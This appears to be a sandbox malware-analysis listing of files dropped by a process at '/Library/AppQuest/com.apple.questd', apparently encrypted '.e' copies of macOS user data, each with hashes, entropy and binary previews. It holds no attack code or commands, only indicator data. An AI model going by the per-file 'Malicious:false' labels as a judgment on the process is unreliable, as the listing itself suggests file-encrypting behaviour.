                                                                                                    Preview: ..@.7R......#f.9sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0...~.H.}..z..+...vw.^.h%......xk+A...._...{&..W.......!.......Y"~z......0.....m4..d...W.v.m7.9..1;.QB.....H._...........%'...b....Mq..kM....).Pk.6i...TVi..{N+...6i...TV...M.klq.".k#E.....&.....x...P....e..9.....?]`.KR.....).x.}}nu.......`...+E....:.+E....:qF1F.a..s.@........&Jw....M\v....<"D/..V..Z.n.....K.%..,.N...m7...[1....]......|sO....w_6K.......:0...5..h.V..#..I........I..L.e.O.....N>..*..>...(....%...GV,..O*E.*i.k..U.._......Q..H..a....Ey.T.1.9U7.xa..SJ.*..~B.U~+.|Y^.".. ..g......e....H.f.....1'.......U.o(.m.6....D.........k......Z..<!.I...;;V.....A....mK........."w.HL.9..)0.N........]}(.....hrD.Y].u#.}m.c.Nk.".t.q.8Lg2....p.R...&..p.......j..EL....u...2PT...u8B).v..S.0...x.....HK.s;..Vg.m0.k.HY...8 .@.:.6...t...)......*.8....|~J.\J........j......z.!..y#.._..^.|..._....).%D.E. ..~(.B...J..?H.9..<....Y.,B=...+i_6.L..|3.v.x.j..Q...1....`5Z..e.....9s.......9.F...v..AA...\....-.......Z.Y....8..:R..`..$..i._..>a.
                                                                                                    /Users/ben/Library/Containers/com.apple.Notes.HTMLConverter/Data/Library/Caches/com.apple.Notes.HTMLConverter/.Cache.db-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.282326169949003
                                                                                                    Encrypted:false
                                                                                                    MD5:A145C72359E23922CCCAF2C8D5E1358F
                                                                                                    SHA1:16655DAFF731E96877B07EE21790A42FA1A00DD8
                                                                                                    SHA-256:381BDE1415C43E1B5F47F9D3BC303AA5CD7B00B670F30C8731833167284D2CB8
                                                                                                    SHA-512:CE20F12DFB5E667D2CE39B819E51F6B5F74E7DEABC305E74AC714BBB37627A59C53218CD1B3FB77AE87C9D0318C0C102EFAF1DFB0F1180A3B1C3FB94FF229F67
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L6~Fe.............................\ck?N..>.k....L6~Fe.....................L.D<.+..\ck?N...........9.o..h$.9.o..h$.........................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.Notes.HTMLConverter/Data/Library/Caches/com.apple.Notes.HTMLConverter/.Cache.db-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.Notes.HTMLConverter/Data/Library/Caches/com.apple.Notes.HTMLConverter/.Cache.db.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):53589
                                                                                                    Entropy (8bit):3.5774867700588486
                                                                                                    Encrypted:false
                                                                                                    MD5:0C9B533CC5CC6C15B29E6DC39CFD1908
                                                                                                    SHA1:8EC874251711EDFAFE6187EB5A609ACA09A0DADC
                                                                                                    SHA-256:B2BABAFFFAEB8C471146A14C737C4746D267A64DB133E249870E141F77BDCB80
                                                                                                    SHA-512:BA9DA07C6D8BCE3B4B4A6CC0A8CB8235435B66E69E8EE0687E16459A3856CC4ADEBAA92EA8C310AC208B9FD9B27E17AD428D3CDEDE83FBB46399DD13ADFF8CD3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t..S..0..........U.....5.~./..efrt...7...t...7............L.D<.+.......]!..1I............j.....".y.c.F0....h.X.3..........................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.Notes/Data/Library/Caches/.com.apple.mobilenotes.persistentstoreopen.lock.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.Notes/Data/Library/CoreData/ExternalRecords/HTMLNotes/.support/.model.mom.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):30683
                                                                                                    Entropy (8bit):7.988502906448906
                                                                                                    Encrypted:false
                                                                                                    MD5:1C05B405A7FA6454B8EFD59CC2783A64
                                                                                                    SHA1:89EF76C5C828B89DDE7E1915735D7B8764633BBC
                                                                                                    SHA-256:81EA3E28C3FC669BFDC1559D83557D8AD8F423BE4A0F3317A654B30341807C97
                                                                                                    SHA-512:A09B256314265650D0B81FDFF931D786BE759BE4969B300D038C3F0E8904A3F983752152DE82F889151F34D52681B741B6F8FC6B5B69EE0C8BB267243858F71B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..j...z.R.....K..]a..7.r..d~...7....Ec\..}jL...HX....u...Y..Q...Mo<5...]WrqqM....S.<..C.....Ea....:>.h:......A.,....J.......W.7........Y......2.$..).z........f.Tc..#\..;...m...z..a#._..up..G.+...e...%.&7.7..\.}.....!.E...D.W.|..u..+\.8:f..,R...d../.Alf.1..._.-.Nl.Q>/+?..Fh.....V..'._...X8x.a...^.(.....-.%....Y....yv!....e...5..T..|......M._.F...Vm.;...-...#..V.`....t.}....7,.(.z..g.....=e!`..O.#'.N.A`.B.u......4g.c...u..............*a.<.r.f!.1...q.r9....9...3/_e<&....rG_.3...W.y.c.}..O.....gYIS?..*aW.........,.RK[..R.\+.&.vH...!*)1........Qo.O0.....j3.|.......)%<....H.3> .VfF,.....L~A7..Hd.4....|[..a.#A...-...l....C`e..E..%...Y/G.......hGR.L.e..9k0E:...os.....W.L(.h(...Kf....dp#.1..L.X......:.....t.m......=.......l/.Q..r.d..M.{...........^....V......W&.N....e.8E.=.M.GS`.J.x..[.....}..l.....*-,iG.......-......2*.#.X8...?...,..^...)..X...... ............$.........{.!.k.w.c.:....t.$<X..r.+0..F........h.K}.$.........8k.fN.GN.)T..{.S...F..V.i.+.c.pc,..J=A......pN.7.%.CH1.\#..%..(EJ..
                                                                                                    /Users/ben/Library/Containers/com.apple.Notes/Data/Library/CoreData/ExternalRecords/NotesV4/.support/.model.mom.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):37876
                                                                                                    Entropy (8bit):7.988367437847061
                                                                                                    Encrypted:false
                                                                                                    MD5:22CAABC5E963FF35CBFE0DEA9CB3B3DD
                                                                                                    SHA1:69EB946982486187B236B263765FAA69B045A6F7
                                                                                                    SHA-256:06A33877EA2A741F6B1B239491E4B0B6B676BC08F9B2E133E22AEC23F0D78C30
                                                                                                    SHA-512:DC81A7544289FC235F75DC3AEE8D8398A0E348E7DACAFA310F5C510EF53110E45183FCA31947507419A6C4B20DACA3531FD542EFFA392FD4DC39401AC950266A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..j...z.R..E..:.......u.?.d~...7....Ec\..}jL...HX....u...Yt......%<5...]WrqqM....S.<..C.....Ea....:>.h:......A.,....J........3...5v)=..Wo....t.W+...U.....r.............xw,......T.?.......3.O].{M.-.F....a[......}.(...:.k.ZmL...E|..=........_..x%.o..}....& .D..$.n......i...zx..%......x..u..u.;$....L>...A.a..".1`..e[V...#9.W5.3. .P.....=Tu.....d.r...7.M.."..s.G........".W.....9#..G..8..._..y..Jd[xHU...wh.P$.e.1....).#.....j]^....>....."!_.~m-...Q.;=p.....;........._".}...].C?.c%...:.{.=...D........d.....s..[.$x..%...M.....C.........y~.R.k..Y.M.,.......P.........<. .D7...m~..".V........w....r.W.&..z.#.Qt.C.a.|.U...t....67.Z5..pQz...Y...J..%W....;.....j.!DR....?.Emk....OA4...+..[>GsK.dC.g[.r..i#.vJ..@.?kf...D... .].>......G.v.7l.#.y.'.....H.g.Or............g.$.?.....X....<.H.e~oY.9.:.|@]=.J...t=...$y..!.H.1u..i.CT....b.....7.L3....i...;.E..3..k.!..d.0'.......V....y^>.b:.T.M8.Rf..wX...<T.)a.....y.~.i.B.j.T.."......x^.d.C5.........P.PpK.G.*tu.\......\.b.E...'.x........f.K!Tx..a.Gz.._.\i
                                                                                                    /Users/ben/Library/Containers/com.apple.Safari.CacheDeleteExtension/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33228
                                                                                                    Entropy (8bit):7.969566826513729
                                                                                                    Encrypted:false
                                                                                                    MD5:D9599EF166E55EE4ED6DEB4F9F2F3B05
                                                                                                    SHA1:859C6BFD17DE634E269BF57909D93213B4C9FECA
                                                                                                    SHA-256:3B2EA97CEE72383FC118DC65AF750BE2A3CB53971CBF10F13586D68663D59AFD
                                                                                                    SHA-512:B491BBCC13F8E3FD4F4D66936B9E6225B9A732E31BD4C00668BAB8EB6261A6C8C24A387C83ABDFE82CAB801CBD2606130B93A614DA3CFF57CF3335DD36E33102
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0...~.H.}..z..+..._...4.....T{M71.v7..t.....\...`..G..,......H.....8H....)../..nv.m.BR...m.'.7.l..7.....?.N..>.<aq..CR...1.<K.h..._.pa!...l.?.~/.1.<K.h..1.<K.h..i.R..Ib..yt....p1.<K.h..9,;{\4.3.(.....h...7..H...r.o...F......l$.EV...i7......~8'.E.eT..........F...........f..J+....#H.....P #4|Z6..Yz1.<K.h..9,;{\4.3._.f[t.l..U..c.Q..#..Qr..35e[.....)./.([.5A.......J Sr~.B.g...V.a?Y..}.Y...E..;....1u*.'zY.No....~.Y=.w.....e1o........?"b...a0.F|g......3 4..G...Y........#.?..<..75S?\].:...C9.;.z.%...3 4..G.Z..f..N`....:.a..Z'.t-..d ..T..b..,...Ph.4..}|.$1.@.o.y4.dW.:.a.2lo...q..:...B........B..M."D....R...^.."............"...xVO.qr.JG<k...N.C.h.\..~....K...l...f..ZNh.c.0)........./....\.ZNh.c.0)..p#6...[....*x}ZNh.c.0)..W._Q....v(.......g..n-5....,.r...;.....S...+b.C%V>...f...X...l..@..G..E.......1.^;...l4?J...49....&...7F..(.c8....|.. {2._.....62.S.}a..$^...9.7.....M7j.Q.S.S.wu...8.aC....71.W............,].N..g.2.A..10[..
                                                                                                    /Users/ben/Library/Containers/com.apple.UsageTrackingAgent/Data/Library/Application Support/UsageTrackingAgent/.UsageTracking.sqlite-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.2796670989949335
                                                                                                    Encrypted:false
                                                                                                    MD5:B85F480100363E5E7559D90BB0E3D7BF
                                                                                                    SHA1:9F81CB4B8F3940ECA57599D841E10D6AF70E02F4
                                                                                                    SHA-256:FDF63BBF63A95097433CFB35D8E76AE40A9AAE963A3A47757E922353F217C46C
                                                                                                    SHA-512:22C065C49B19367A05697A85299F038653CE86F9CA97B7ADF5B2FAB18857CEA9074C3573304EC1ED4E4D4F45E2C1E570BA2B6A28FA4B4EADFB2954AC0642297E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L6~Fe.............................\ck?N..>.k....L6~Fe.....................L.D<.+..\ck?N...........9.o..h$.9.o..h$.........................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.UsageTrackingAgent/Data/Library/Application Support/UsageTrackingAgent/.UsageTracking.sqlite-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.UsageTrackingAgent/Data/Library/Application Support/UsageTrackingAgent/.UsageTracking.sqlite.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):90471
                                                                                                    Entropy (8bit):4.042939990913978
                                                                                                    Encrypted:false
                                                                                                    MD5:C996E4B6501CC65B2F19CC739AC29D54
                                                                                                    SHA1:AE36D654176401CD3F978B0A796A8B68CA21C733
                                                                                                    SHA-256:CCF92784054F8432870AA8390A287FA629C793789637F80F2BCD26DA7367AA39
                                                                                                    SHA-512:8B00F47D2149FF7F5B4AC6FE22DE2B405899E4FCBD326C26DE62A9E02C8B8D059204714609FB0951558C93EFB0337EAC002E1798E574118C38F925872648786E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t.^.'b.f..........w...d....io. g:t...7...t...7............L.D<.+.......]!,,.<.~...I.'9..S..O.m..T...{..1;..Z{.....=X3........k............................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.........................................................................................................................T/..........g.bK!Qh....E..V.cD.z..xN}W..A..;.%g..5.r....%.{.2i..ST...yj..=C.14...L..o..W.Gl(...Ws....|6:.-...h...E..B..]..<......@..c.n..E..B..]....j...... ...`....m..C....nc....O.@.".-g.....JK......,t.......u.....$x..uj...oT.>....KmL.u....^)...-.....)...R...)L.|......P... .jw.|.
                                                                                                    /Users/ben/Library/Containers/com.apple.appstore/Data/Library/Preferences/.com.apple.commerce.knownclients.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1866
                                                                                                    Entropy (8bit):7.6209989065820345
                                                                                                    Encrypted:false
                                                                                                    MD5:D1593B43DFA6D06C9F9B273ACA72C79F
                                                                                                    SHA1:AB0B569AFB1D742F4ABAD98CBF6F76F54AC6E807
                                                                                                    SHA-256:752F94B630022BBF7F76806EAEBA0F664E463E8BFB83D3925BC54065E8D1CE83
                                                                                                    SHA-512:18F09568CB1E41DC3C34960921FB28340CD471785A21F1998AE7B90EF083CBEC15D8693C495CD4B0428228B38F91C0A1566EE25571206C321057F6A808B24F66
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..}.....6..MN.z>....Q..i.rfM.S..a...@.7R..=D.A.5.....?8..id~...7....Ec\..}..d........u...Y..@..(....OU.....O..Q3t.~T.M.......++.A...1?K.D..WK{...s....\})...O>.r...1...X.......q..BwC....@1.JzI.\.....1..A.........N0....^X2...t..\..KC.e.'...,"..E..#)..].K..kY..Q.oq.U.....#P\Te.v..n.,..I(...w.jm.z.Fi*...T.%.].7..H.ZJ.IT.....D....t...Md...1...(H.u.6..%z.....b.E.`..O...T..@q....S..D.*...l...6.5J....-......Ja>....<.:0.i3!...:}.Fk.F.16x.p[./..3...\7....C.....'0........'....O.uM6.x`.......[....;?...e4..ya.......a.....h...........0{....C.m.......O.uM.....yO.DU.......$X........n...[.l......sM?8%.S......6}@o...c.G.....ru5_]_..F.UhI, +.3.oK..0......yX&T.=./..j.[.]E[.1.C@.~"..C.....0$u......V...n_..2j.{./..j.[..M.>x?d.@....<..A.._.R.........j.W.!..0..n..sL.dk.}....)7.&.. ....I.Z.m.gZ..f..,..k......z..e@.m.X.e..#...I. .H..I+>..a..a.....7.M.>x?d...2+....c..<d R......<.....7E.V+.q....9j.BJ..+mg..O...y......zY.....Hk.......x.......A#.gY=..An....H.y..`...}/.........m..Y...M....x.+Ou..'.p.e.BFc..N..
                                                                                                    /Users/ben/Library/Containers/com.apple.calculator/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):27307
                                                                                                    Entropy (8bit):7.961527333657174
                                                                                                    Encrypted:false
                                                                                                    MD5:F0D13FBF328977910483B27BFD52E3E7
                                                                                                    SHA1:3C080EA3E376CE29A238CD4CA8D330E46BDAB536
                                                                                                    SHA-256:F19DFF399F605AFA382F0B1836E8969D4086CFD33E70E48AF76CDD9473960C25
                                                                                                    SHA-512:E3346EAE30058BC92C93044E1BE94A87EC8E0D7976112A9C4FF290D7AF99CBD1018DA8848C1F8C238C6698AAFC8B8F6FBCB941CAF54521402109CDB1BA59ACF5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0...~.H.}..z..+...LpAlG....:.....(..+...u....t~._X>.5....C7.6..Fw.1N.{:..>....Q...2......*..C.w.>.Z......d#<.V...k:E.Z.D.;.!SG3.y..$..t. :./..@..;.!SG3.y;.!SG3.y..D...;. ..VC...;.!SG3.y.X...M.5..*r..6..h......b....XWvE...@...i.u..ao...$..7....._MEY...G..wPNAX;....)(].x.@..'..d.[....s....O9.. aZ..;.!SG3.y.X...M.5u...@...d.\._6...z.!..........r1............Z.E[..J Sr~..?......h1.........P.E'.>..X5..iV..k.._8.Sws..)....I.....8.w..`.6.w.oW?W......&..b..kM.j..C.....?.....9..,..H....i..v...D.....EL.b..kM.jt...t.w..>....c.C..v..SM....:.B).`....h3v.......e7rZ...E.8".}.....j..l)..v..3..;.8p..'..V..{....".........8I.)l.M..5b....o.,......-^n.y.....yxEv...3.S..........L7W..sX....3.S..........}|.`O......3.S..u..J`..WQ.. ..w.....M.m.g...7eH..).!.#*.T...u~.d......Z.s...(....#q...~.....'.2LO.<....t..o.. .I......z.....,.j.....|.. s;<....,.l..R^Dy,...\...O.].+....5.?..;.....{..`o1[...Vlr~.6...U.....e=.^"..z.QT.rp(..8.Z......F.X.M..c.
                                                                                                    /Users/ben/Library/Containers/com.apple.cloudphotosd/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):35284
                                                                                                    Entropy (8bit):7.970192305104574
                                                                                                    Encrypted:false
                                                                                                    MD5:3454D55FD965D017C7F60AA727810075
                                                                                                    SHA1:452D3689199AA96F5E49F25821D1B0BDD25BBB05
                                                                                                    SHA-256:E972D8E33D0F77FE087103E7D77050F14401CB6A54CCC616F1BD5BA143D0B1EA
                                                                                                    SHA-512:F494E8EB2E63B8F2675F0E977391389FD2783EF7E43B78DCC45B49724C9D15E694AE2EF76168931D1C77F7CE212E7255BD72F82434D4FCEDA004AAE049303B53
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0...~.H.}..z..+.......R.....\...d6.7..Lj....=...5.....|&.V.'....N.........Bj....../..C.VT.......=.:.JC.~.R-O..`s.f\.@].G..o.Z../...2p...H.(_.A.T".o.Z../..o.Z../...e. ....(?L.e.).o.Z../.};..)..dn..'..W.g..X...j$.s.>..-...A.%......$...2....F..3...Q.. L.....S....$-.e....0C./.ZD.!......AC..2}F.e)N.X..o.Z../.};..)..d.u...|.1Y..........K?.,h..Gvm..&#...c~.......dod.h..Lhg.!..u._ ._..c..Z....c{@.j..r"#..K....3.Zw-...8|./.........e....U.RSx....*..0.S:.....r....n.yrb.oQVj.zyq2w..]]....B.t<..4....|.........vxrn.yrb.oQ.e?hz..n........1..z:.Z..] ..l/o...{.O.,...h.....%....+.L..P3....v^..;........9yj....CS....O}..OMB..>.Bo"..........aHU.C..BX.....2M..;Wf..K;.e...Np......m._...x.R.yf..-0.y.L....^r..V....[...Hh.C..B.Y..^r..V..9e..2.P\..Z.2..m.^r..V.../..L....U....].3.....6A..!.....,.......*...k..S.9..V....ta*.e..=6.n`....Z..qf..f_..,....a.rD...f...q..ELm..;.r.....|.. ...._.I....tS.a......r.7...UA.....L...S.......UR.>.7.QD..a.VkWM.
                                                                                                    /Users/ben/Library/Containers/com.apple.cloudphotosd/Data/Library/Application Support/com.apple.cloudphotosd/services/com.apple.photo.icloud.myphotostream/.serviceDirectoryInfo.bin.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):594
                                                                                                    Entropy (8bit):6.385418469755651
                                                                                                    Encrypted:false
                                                                                                    MD5:5791D3AB9E0393AD42A4F8DB881A8D48
                                                                                                    SHA1:2604E822FBB1B95931E0D6AC58E8AEE5A872449F
                                                                                                    SHA-256:D1208D647C2678226A27511313DADFD1D8DC78C2A74E44C0B03B7631B604C731
                                                                                                    SHA-512:F8A01C73DB6ABD64ECE41B39A5840DC5FB1BE3CD2813E4C715595A79393E405DB2A6DBFF1FD6C7BE4C8CE351EF5284373E9644E0B6AA124025EAE79685F5BD9B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..K.........J..u0.d~...7....Ec\..}jL...HX....g.w.h.d.....#..5u.(&....T...$....a..g+.....q..l>+....^.G..Bm.P4...2....=..T.........i.M...q......h....Bi.... ....v.....^$.......zW......W...?. Y0&u.*..}Y...?r..*;...<.............2...\IT.~...Q........q.(..)....).7...X~.H...........5C..P*.!................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.cloudphotosd/Data/Library/Application Support/com.apple.cloudphotosd/services/com.apple.photo.icloud.sharedstreams/.serviceDirectoryInfo.bin.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):594
                                                                                                    Entropy (8bit):6.385418469755651
                                                                                                    Encrypted:false
                                                                                                    MD5:5791D3AB9E0393AD42A4F8DB881A8D48
                                                                                                    SHA1:2604E822FBB1B95931E0D6AC58E8AEE5A872449F
                                                                                                    SHA-256:D1208D647C2678226A27511313DADFD1D8DC78C2A74E44C0B03B7631B604C731
                                                                                                    SHA-512:F8A01C73DB6ABD64ECE41B39A5840DC5FB1BE3CD2813E4C715595A79393E405DB2A6DBFF1FD6C7BE4C8CE351EF5284373E9644E0B6AA124025EAE79685F5BD9B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..K.........J..u0.d~...7....Ec\..}jL...HX....g.w.h.d.....#..5u.(&....T...$....a..g+.....q..l>+....^.G..Bm.P4...2....=..T.........i.M...q......h....Bi.... ....v.....^$.......zW......W...?. Y0&u.*..}Y...?r..*;...<.............2...\IT.~...Q........q.(..)....).7...X~.H...........5C..P*.!................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.cloudphotosd/Data/Library/Preferences/.com.apple.cloudphotosd.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):394
                                                                                                    Entropy (8bit):5.20849014918978
                                                                                                    Encrypted:false
                                                                                                    MD5:E62141FDBBBF57AF3E49012200448EC3
                                                                                                    SHA1:32B26305BE0EA431402B420F15672396A9A5544A
                                                                                                    SHA-256:6596CE4243643FBBCF3525EA996CDFF494B11647382A6C2FAF4046C5499B2232
                                                                                                    SHA-512:73CDF700BD432BDEC46892BED5DA330D56705B195CA96FE3B0F1F4A4CD43CE878B535D19548A2D37823B4AD4051BB869AC44BAE613D4B8F0B3F0B97B83224019
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R...D72.i....#c.."..s.\....]....^J....Z...a.....u......|.. .#u....D........20...#$..Y................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.geod/Data/Library/Caches/GeoServices/MapTiles/.MapTiles.sqlitedb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):41292
                                                                                                    Entropy (8bit):3.50321915135012
                                                                                                    Encrypted:false
                                                                                                    MD5:35DC2F1F68DF82FAC6F659D8A6639216
                                                                                                    SHA1:5B6B4CCA18D184F30717776153D1AF77F76BFA61
                                                                                                    SHA-256:6FAF90EC8C9B88B7F56649D15C48581AC93EFCCB62B29F5167F0A01F6C299B7D
                                                                                                    SHA-512:CB3C1AFD4E0D2737D849EDEAB9ABC52E246A8621FD3899562A4CDE773B96A045C80A8B79269E8BE02291FD93800AAA32D29D60A45F5F4BBBD14FE711D935FC07
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT..lP...i..yg...,.........g.g..(..........t...7....................L.D<.+..`...=P*q. U.|.V..2.......F..WJ.YV.E<{.k.................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.geod/Data/Library/Caches/com.apple.geod/MapTiles/.MapTiles.sqlitedb-journal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.geod/Data/Library/Caches/com.apple.geod/MapTiles/.MapTiles.sqlitedb.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):127353
                                                                                                    Entropy (8bit):6.471184314841416
                                                                                                    Encrypted:false
                                                                                                    MD5:A01526FCE4093C43CEFDDC406FBE303B
                                                                                                    SHA1:5F0044023826A896C59D405FCFC45F47C8AC8927
                                                                                                    SHA-256:5F106943D56DD5CB8B75095A891342543ABFC65FE960694EE58C73A31A1414AA
                                                                                                    SHA-512:130C2EAF56181C0A94E79147FBE74EEF725E32FAD725F27970F2348B7EFCA07A8793DD594BAD427FF0283E11784B6C3ACE001625D0FF1AEAF1E58E123B997F13
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT..lP...i.....p...........U.....5.~./..efr@>,?G.r..................L.D<.+..._)...y....>L.4J..d..v_......................%..........................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
